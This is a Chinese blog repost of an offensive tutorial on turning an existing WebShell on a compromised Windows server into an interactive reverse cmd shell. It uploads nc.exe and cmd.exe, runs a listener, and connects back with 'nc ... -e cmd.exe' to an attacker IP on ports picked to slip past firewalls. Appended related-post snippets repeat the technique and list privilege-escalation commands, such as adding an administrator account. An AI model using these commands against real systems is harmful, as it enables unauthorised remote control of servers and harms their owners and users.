利用WebShell反弹低权限CmdShell

最新推荐文章于 2022-04-17 14:50:40 发布
最新推荐文章于 2022-04-17 14:50:40 发布
阅读量110 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/mujj/articles/2088570.html
版权

虽然是低权限的,能做的事和WebShell上的差不多,不过使用起来还是要方便很多。

前提:
1.能用WebShell运行cmd命令。
方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。

2.上传nc。可以跟cmd.exe上传到同一目录。

步骤:
现在本地监听一个端口。

nc -vv -l -p 8080

最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被Apache占了,就用8080了。

在WebShell运行下面命令连接我们监听的端口得到CmdShell:

nc -vv 222.71.138.177 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe

(假设cmd.exe是上传在“C:\Documents and Settings\All Users\Documents\”这个目录的)
稍等片刻,不出意外的话就可以得到CmdShell了。

不过我前面也说了,是低权限的CmdShell,能做的事情很少,但如果我们要运行很多cmd命令的话,还是要方便很多。
如果要在反弹的CmdShell里面运行上传的程序,要用如下个格式:

C:\WINDOWS\system32\inetsrv>"C:\Documents and Settings\All Users\Documents\cmd.exe"

效果如图:

2011062406204428.jpg

2011062406210272.jpg

2011062406211957.jpg

转载于:https://www.cnblogs.com/mujj/articles/2088570.html

weixin_30535565
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webshell下使用NC反弹cmdshell
weixin_34376986的博客
03-03 346
前提: 1.能用WebShell运行cmd命令。 方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。 2.上传nc。可以跟cmd.exe上传到同一目录。 步骤: 1、本地监听一个端口。 nc -vv -l -p 8080 最好是80或8080这样的端口,被防火墙拦截的几率小很多。 2、在WebShel...
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2750
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接
【提权概述】
一个普普通通的博客
04-17 1001
提权概述 常用命令 whoami 查看当前用户名,用于查看权限大小 ipconfig 显示当前tcp/ip配置。用于查看ip net user 查看当前系统的所有用户 net user 账号 密码 /add 创建用户 net loaclgroup administrators 账号 /add 将用户加入管理员组 tasklist /svc 查看远程连接的端口 寻找termserver的pid netstat -ano 查看机器端口占用情况,找到对应的pid号 提权用
ASP WEBSHELL权限总结
asli33的专栏
10-12 2795
文章作者:enterer 博客:www.enterer.cn 转载请保留 我为什么会写这篇文章呢,当然是因为我很闲(误)。因为本人虽然是个菜鸟,学习也就4个多月,但是觉得应该写些东西和大家交流。本人是提权爱好者,虽然技术一般,但是有耐心些出来和大家交流交流。打算写个提权的系列文章,汗,本人也只是小白而已。 提 权的基础是什么呢?拿到一个webshell,你最想干什么呢,当然是拿下服务器了。
shell 写入文件_文件上传的一个骚操作(权限+bypassAV)
weixin_39976499的博客
01-22 426
各位在渗透中是否遇见过这个问题:虽然有权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:其中包括杀软或某狗、某盾:...
webshell反弹技术
01-05
webshell反弹技术
利用 通达OA 文件上传漏洞上传webshell获取主机权限
最新发布
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
php反弹shell实现代码
10-30
综上所述,这篇文档详细介绍了利用PHP脚本实现反弹Shell的整个过程,包括必要函数的编写、Shell脚本的base64编码、以及最终如何利用Socket进行网络连接。需要注意的是,这种技术通常与黑客攻击相关联,因此在实际...
webshell权限劫持一体化.zip
07-07
Webshell权限劫持一体化是一种针对网站安全的重要话题,主要涉及Web服务器被恶意代码渗透后,攻击者通过Webshell获取服务器的控制权。Webshell通常是一段小型的PHP、ASP、JSP或其它脚本,被植入到服务器的网页文件中...
超全的webshell权限提升方法
10-31
超全的webshell权限提升方法
059 提权与反弹shell
鸡蛋炒鸡蛋
04-07 4672
文章目录一:权限提升概述二:windows提权2.1: 启动项提权2.2:系统漏洞提权2.2.1:笔记2.2.2:实验 一:权限提升概述 水平权限提升(越权) 同级账户间切换身份,比如有ABC三个用户,AB是普通用户只能自己发帖,然后只能删除自己的贴,C是管理员能删除所有人的帖子,然后突然A可以删除B的帖子了,这就是越权。 垂直权限提升 普通用户获得了管理员的权限 web用户直接提权成管理员用户     二:windows提权 前提: 基于webshell提权,也就是说目标机器存在大马文
提升WEBSHELL权限
CARBON
04-21 1632
 提升WEBSHELL权限当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1.C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆2.C:/WINNT/system32/config进这
命令注入写webshell
weixin_34082177的博客
03-10 2623
2019独角兽企业重金招聘Python工程师标准>>> ...
NC反弹CMDSHELL提权总结
weixin_34404393的博客
03-15 561
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去   2:然后本地执行nc -vv -lp 52进行反弹   ...
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
提权(最全的WEBSHELL
Coisini的博客
05-24 1万+
最全的WEBSHELL c: d: e:… C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了...
安服面试点总结
1
02-22 7917
目录 3389无法连接的几种情况 二次注入 报错注入的函数 基于格式错误的报错(xpath语法错误) 基于主键重复错误 堆叠注入 判断出网站的CMS对渗透的意义 一个成熟并且相对安全的CMS,渗透时扫目录的意义? mysql注入点,用工具对目标站直接写入一句话,需要哪些条件? 1.3389无法连接的几种情况 端口没有开放 端口被修改了 被拦截了 没出网(处于内网(需要进行端口转发)) 2.二次注入 恶意数据经过一些转义函数(get_magic_quotes_gpc)的
WEBSHELL权限提升技巧(综合版)
蓝法典的专栏
08-19 3907
c: d: e:.....C:/Documents and Settings/All Users/「开始」菜单/程序/看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,
shell脚本执行文件权限不足的问题
不会划水猴子的博客
11-01 1万+
今天就是一个机器出现了脚本无法执行的问题。提示没有权限,但是最重要的是文件已经777最高权限了。 有个发现是使用 bash ./clean.sh sh ./clean.sh 都是可以正常执行的。 但是当执行 ./clean.sh permission denied 提示权限不足。 我们这边执行脚本都是使用./的。一直很正常。现在先把这个问题记录一下。 以下是我转载的资料。其实我对这个也不熟。 ...
SQLmap获取Webshell与系统权限:命令详解
"本文主要探讨了如何使用SQLmap进行SQL注入以获取Webshell和系统权限。SQLmap是一款强大的SQL注入自动化工具,它不仅可以进行常规的SQL注入测试,还能执行操作系统命令,读写文件,甚至尝试权限提升。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值